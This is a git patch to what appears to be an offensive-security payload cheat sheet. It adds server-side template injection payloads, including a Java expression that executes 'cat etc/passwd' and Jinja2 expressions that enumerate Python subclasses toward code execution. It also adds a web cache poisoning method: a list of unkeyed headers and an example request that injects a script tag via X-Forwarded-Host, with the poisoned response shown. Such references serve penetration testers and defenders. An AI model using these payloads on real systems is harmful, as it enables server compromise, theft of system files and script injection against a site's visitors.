From 1a1a48c7258f03e52aff0fb97e4bb79f95a5458e Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 23 Sep 2018 20:07:19 +0200
Subject: [PATCH] Web Cache Deception details from SI9INT's blogpost

---
 Server Side Template injections/README.md |  7 ++++-
 Web cache deception/README.md             | 35 +++++++++++++++++++++--
 2 files changed, 39 insertions(+), 3 deletions(-)

diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index 7ce960f..7a43ed5 100644
--- a/Server Side Template injections/README.md	
+++ b/Server Side Template injections/README.md	
@@ -46,6 +46,8 @@ ${T(java.lang.System).getenv()}
 ### Java - Retrieve /etc/passwd
 
 ```java
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
@@ -160,6 +162,8 @@ The above injections have been tested on Flask application.
 ### Jinja2 - Dump all used classes
 
 ```python
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 ```
 
@@ -223,4 +227,5 @@ $eval('1+1')
 * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
 * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
 * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
-* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
\ No newline at end of file
+* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
+* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
\ No newline at end of file
diff --git a/Web cache deception/README.md b/Web cache deception/README.md
index ed89cb8..3e59cf3 100644
--- a/Web cache deception/README.md	
+++ b/Web cache deception/README.md	
@@ -1,5 +1,10 @@
 # Web Cache Deception Attack
 
+## Tools
+
+* [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
+    > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
+
 ## Exploit
 
 1. Browser requests `http://www.example.com/home.php/non-existent.css`.
@@ -16,11 +21,37 @@
 4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
 5. The content of the cache is displayed
 
+Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 [![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
 
-Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
+## Methodology 2
+
+1. Find an unkeyed input for a Cache Poisoning
+    ```js
+    Values: User-Agent
+    Values: Cookie
+    Header: X-Forwarded-Host
+    Header: X-Host
+    Header: X-Forwarded-Server
+    Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
+    Header: X-Original-URL (Symfony)
+    Header: X-Rewrite-URL (Symfony)
+    ```
+2. Cache poisonning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
+    ```js
+    GET /test?buster=123 HTTP/1.1
+    Host: target.com
+    X-Forwarded-Host: test"><script>alert(1)</script>
+
+    HTTP/1.1 200 OK
+    Cache-Control: public, no-cache
+    [..]
+    <meta property="og:image" content="https://test"><script>alert(1)</script>">
+    ```
+
 
 ## Thanks to
 
 * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
-* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
\ No newline at end of file
+* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
+* [Web Caching - SI9INT](https://si9int.sh/article/6)
\ No newline at end of file